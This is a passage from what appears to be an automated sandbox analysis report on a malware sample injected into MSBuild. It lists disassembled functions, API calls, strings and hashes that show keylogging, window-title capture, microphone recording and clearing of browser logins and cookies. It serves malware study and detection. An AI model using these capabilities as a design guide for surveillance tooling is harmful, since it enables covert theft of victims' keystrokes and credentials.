                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                        • API String ID: 3472027048-1236744412
                                                                                                                        • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                        • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                        • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                        • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                        Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                                        • String ID: @CG$exepath$BG
                                                                                                                        • API String ID: 4119054056-3221201242
                                                                                                                        • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                        • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                        • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                        • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                        Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                          • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                          • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                                                        • String ID: [ $ ]
                                                                                                                        • API String ID: 3309952895-93608704
                                                                                                                        • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                        • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                        • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                        • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                        Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                        • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                        • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                        • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                        Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                        • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                        • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                        • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                        Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                          • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                          • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 737400349-0
                                                                                                                        • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                        • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                        • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                        • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                        Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                        • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                        • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                        • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                        • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                        Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3919263394-0
                                                                                                                        • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                        • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                        • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                        • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                        Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                        • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                        • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4116985748-0
                                                                                                                        • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                        • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                        • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                        • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                        Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleOpenProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 39102293-0
                                                                                                                        • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                        • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                        • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                        • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                        Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID: $fD
                                                                                                                        • API String ID: 1807457897-3092946448
                                                                                                                        • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                        • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                        • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                        • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                        Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 0-711371036
                                                                                                                        • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                        • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                        • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                        • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                        Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                        Strings
                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                        • API String ID: 481472006-1507639952
                                                                                                                        • Opcode ID: cc2e8fdc496267155201b16627e0203c98a38a6ed5fb5594af8cf6ec90a1053f
                                                                                                                        • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                        • Opcode Fuzzy Hash: cc2e8fdc496267155201b16627e0203c98a38a6ed5fb5594af8cf6ec90a1053f
                                                                                                                        • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                        Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                        • API String ID: 481472006-2430845779
                                                                                                                        • Opcode ID: d635f5de0eb30f12a53b303b4771e55d0759891efdf147d162576b96ad6faa0a
                                                                                                                        • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                        • Opcode Fuzzy Hash: d635f5de0eb30f12a53b303b4771e55d0759891efdf147d162576b96ad6faa0a
                                                                                                                        • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                        Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExistsFilePath
                                                                                                                        • String ID: alarm.wav$xIG
                                                                                                                        • API String ID: 1174141254-4080756945
                                                                                                                        • Opcode ID: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                                        • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                        • Opcode Fuzzy Hash: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                                        • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                        Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                        • String ID: Online Keylogger Stopped
                                                                                                                        • API String ID: 1623830855-1496645233
                                                                                                                        • Opcode ID: 02e0c4701129a9c42addc2d2970a81326eabfec1a0363ad7f570d4515b217cc8
                                                                                                                        • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                        • Opcode Fuzzy Hash: 02e0c4701129a9c42addc2d2970a81326eabfec1a0363ad7f570d4515b217cc8
                                                                                                                        • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                        Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                                                        • String ID: T=G
                                                                                                                        • API String ID: 2315374483-379896819
                                                                                                                        • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                        • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                        • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                        • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                        Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocaleValid
                                                                                                                        • String ID: IsValidLocaleName$j=D
                                                                                                                        • API String ID: 1901932003-3128777819
                                                                                                                        • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                        • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                        • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                        • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                        Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: T=G$T=G
                                                                                                                        • API String ID: 3519838083-3732185208
                                                                                                                        • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                        • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                        • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                        • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                        Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                          • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                        • String ID: [AltL]$[AltR]
                                                                                                                        • API String ID: 2738857842-2658077756
                                                                                                                        • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                        • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                        • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                        • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                        Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00448825
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        Strings
